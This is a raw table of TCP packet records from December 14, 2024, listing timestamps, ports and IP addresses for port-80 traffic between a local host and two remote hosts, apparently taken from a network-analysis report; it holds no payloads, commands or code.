Dec 14, 2024 12:56:34.042047977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.042859077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.042916059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.042989016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.043230057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.044120073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.044176102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.044179916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.044224024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.045250893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.045367956 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.045428991 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.046386957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.046448946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.046597004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.046652079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.047552109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.047619104 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.047738075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.047795057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.048741102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.048804045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.048948050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.049005032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.049935102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.049988985 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.050061941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.050111055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.051126003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.051184893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.051244020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.051304102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.052273989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.052335024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.052376032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.052450895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.053451061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.053525925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.053576946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.053633928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.054670095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.054728031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.054815054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.054867029 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.055876017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.055931091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.055943012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.056000948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.057046890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.057118893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.057169914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.057233095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.058178902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.058300018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.058342934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.058388948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.059350967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.059403896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.059545994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.059607029 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.060520887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.060581923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.060630083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.060693026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.061671972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.061729908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.061820984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.061877966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.062891960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.062948942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.063015938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.064038992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.064100027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.064172983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.064228058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.065248966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.065320015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.065346003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.065407038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.066417933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.066498041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.066509008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.066936016 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.067899942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.067977905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.068043947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.068238974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.068753958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.068813086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.068875074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.068924904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.069977045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.070036888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.070126057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.070185900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.071137905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.071202040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.071252108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.071305990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.072299957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.072357893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.072431087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.072485924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.073488951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.073549986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.073638916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.073692083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.074646950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.074712992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.074793100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.074945927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.075825930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.075886965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.075907946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.075963974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.077009916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.077066898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.077147007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.077208042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.078154087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.078315973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.208744049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.208823919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.208847046 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.208904028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.209253073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.209315062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.209387064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.209450960 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.210453033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.210506916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.210568905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.210628986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.211606026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.211662054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.211781979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.211889029 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.212800026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.212858915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.212959051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.213015079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.213949919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.214006901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.214092016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.214145899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.215172052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.215228081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.215293884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.215352058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.216358900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.216422081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.216464996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.216517925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.217493057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.217555046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.217674017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.217734098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.218684912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.218739986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.218812943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.218872070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.219878912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.219935894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.220010042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.220063925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.221055984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.221203089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.221246958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.221307039 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.222259998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.222310066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.222382069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.222436905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.223388910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.223443985 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.223517895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.223571062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.224658012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.224783897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.224796057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.224847078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.225881100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.225950003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.226022959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.226200104 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.226927042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.226979971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.227072001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.227133989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.228127003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.228188038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.228266954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.228399038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.229295015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.229357958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.229445934 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.229515076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.230472088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.230536938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.230585098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.230783939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.231719017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.231784105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.231822968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.231873989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.232845068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.232897997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.232904911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.232953072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.234008074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.234066963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.234086037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.234139919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.235176086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.235229015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.235383034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.235459089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.236354113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.236412048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.236453056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.236510038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.237620115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.237679958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.237752914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.237804890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.238706112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.238770008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.238857031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.238912106 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.239892006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.239945889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.239950895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.239996910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.241085052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.241144896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.241286039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.241342068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.242248058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.242302895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.242438078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.242495060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.243451118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.243503094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.243508101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.243561983 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.244613886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.244673967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.244815111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.244872093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.245829105 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.245884895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.245939016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.245991945 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.246967077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.247023106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.247035027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.247080088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.248150110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.248208046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.248261929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.248334885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.249396086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.249470949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.249507904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.249562025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.250489950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.250560045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.250633001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.250694036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.251781940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.251838923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.251915932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.252005100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.252849102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.252933979 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.252974987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.253037930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.254010916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.254070997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.254106998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.254160881 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.255198002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.255270958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.255366087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.255422115 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.256485939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.256546974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.256648064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.256706953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.257812977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.257872105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.257942915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.258002996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.259433985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.259493113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.259578943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.259629965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.260474920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.260534048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.260596991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.260652065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.261439085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.261499882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.261564016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.261615038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.262608051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.262660980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.262669086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.262713909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.263704062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.263761044 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.263786077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.263885975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.264642954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.264698982 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.264938116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.264991045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.265780926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.265839100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.265912056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.265969038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.266978025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.267040968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.267193079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.267277956 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.268142939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.268198013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.268315077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.268372059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.269386053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.269444942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.269503117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.269556999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.270524979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.270586014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.320683002 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.320741892 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.320749044 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.320777893 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.320796967 CET	49834	80	192.168.2.4	185.215.113.206
